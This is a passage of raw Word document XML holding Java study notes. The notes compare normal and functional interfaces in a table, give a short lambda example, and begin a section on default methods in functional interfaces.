    <w:p w14:paraId="44853E59" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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rmal Interface (cannot be used with lambda)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B5BDD0"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MyInterface {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453FBA77"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void method1();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E14245"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method2();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B81F25"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68F8C43" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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unctional Interface (can be used with lambda)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C049433"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nctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B6224B"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MyFunction {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444E992C"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execute();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165705A1"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37FA065" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F03">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7239114A"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1259327B"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02F2500F"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sing Lambda Expression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F60BD8"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yFunction func = () -&gt; System.out.println("Executing the method!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E312063"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unc.execute();  // Output: Executing the method!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB421F3"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28732A8" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F0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7AF2688" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00531F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A50B872">
          <v:rect id="_x0000_i1681" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0565FE89" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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 of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9"/>
        <w:gridCol w:w="3082"/>
        <w:gridCol w:w="5043"/>
      </w:tblGrid>
      <w:tr w:rsidR="00531F03" w:rsidRPr="00CE4B95" w14:paraId="11E1E671" w14:textId="77777777" w:rsidTr="00434D78">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34E27A0E" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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6F712BF9" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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Normal Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63B0D4D5" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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unctional Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531F03" w:rsidRPr="00CE4B95" w14:paraId="2DA73754" w14:textId="77777777" w:rsidTr="00434D78">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22524895" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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umber of Abstract Methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49B73333" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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an have </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>multiple abstract methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="143418C7" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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Must have </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>exactly one abstract method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531F03" w:rsidRPr="00CE4B95" w14:paraId="08CFBCCB" w14:textId="77777777" w:rsidTr="00434D78">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03024B5D" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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nnotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A11EAF5" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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need for any annotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C6F6703" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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unctionalInterface</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> annotation is optional but recommended</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531F03" w:rsidRPr="00CE4B95" w14:paraId="0D08D079" w14:textId="77777777" w:rsidTr="00434D78">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="248A72DE" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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ault and Static Methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E656E2F" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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an have </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>default and static methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4441027A" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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an have </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>default and static methods</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, but only </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>one abstract method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531F03" w:rsidRPr="00CE4B95" w14:paraId="3CC14D9C" w14:textId="77777777" w:rsidTr="00434D78">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="263276BE" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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ambda Expression Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7902271E" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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t compatible</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> with lambda expressions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62A3B0C4" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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atible</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> with lambda expressions and method references</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531F03" w:rsidRPr="00CE4B95" w14:paraId="4304C9C0" w14:textId="77777777" w:rsidTr="00434D78">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5ECB1D8E" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3139C028" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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to define contracts with multiple methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F8D83C5" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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for single-method interfaces often passed as behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531F03" w:rsidRPr="00CE4B95" w14:paraId="290FE9AF" w14:textId="77777777" w:rsidTr="00434D78">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29BC9288" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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heritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="424E45B2" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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extend multiple interfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FD492C8" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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extend multiple interfaces, but only if they each have one abstract method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531F03" w:rsidRPr="00CE4B95" w14:paraId="4DF27C53" w14:textId="77777777" w:rsidTr="00434D78">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6284AF0C" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="173C3C59" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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fine a contract for implementing classes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CE3E5C4" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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nded to be used with lambda expressions for functional programming</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A985A2F" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00531F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5C0F929">
          <v:rect id="_x0000_i1682" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C8BBB3" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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3CD5C12E" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00531F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functional interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a special type of interface with exactly one abstract method, and it is meant to be used in conjunction with lambda expressions or method references. A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>normal interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can have multiple abstract methods and is used to define more general contracts for implementing classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD4872B" w14:textId="5A7E790D" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004464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7524719">
          <v:rect id="_x0000_i1683" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E9221E" w14:textId="77777777" w:rsidR="00520371" w:rsidRPr="00CE4B95" w:rsidRDefault="00520371">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="217" w:name="_Toc196307697"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the default method in functional interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="217"/>
    </w:p>
    <w:p w14:paraId="56F8A0BA" w14:textId="661F8C63" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">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a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a method that is provided with a default implementation. This feature was introduced in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Default methods allow developers to add new methods to interfaces without breaking the existing implementation of classes that already implement the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3AD3DE" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B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Points About Default Methods in Functional Interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADEAC63" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97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ault Implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Default methods can have a body, meaning they can provide a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This allows you to add methods to an interface while ensuring that existing classes that implement the interface don't need to modify their code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B882969" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97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yntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Default methods are defined using the default keyword in the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A953A6" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Even though functional interfaces are expected to have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only one abstract method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, they can still have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default method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static methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The presence of default methods does not violate the functional interface rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FACB1D" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97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an be Overridden</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Default methods can be overridden by the implementing class if needed, but if not overridden, the default implementation from the interface will be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F0023" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97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Multiple Default Methods</w:t>
      </w:r>
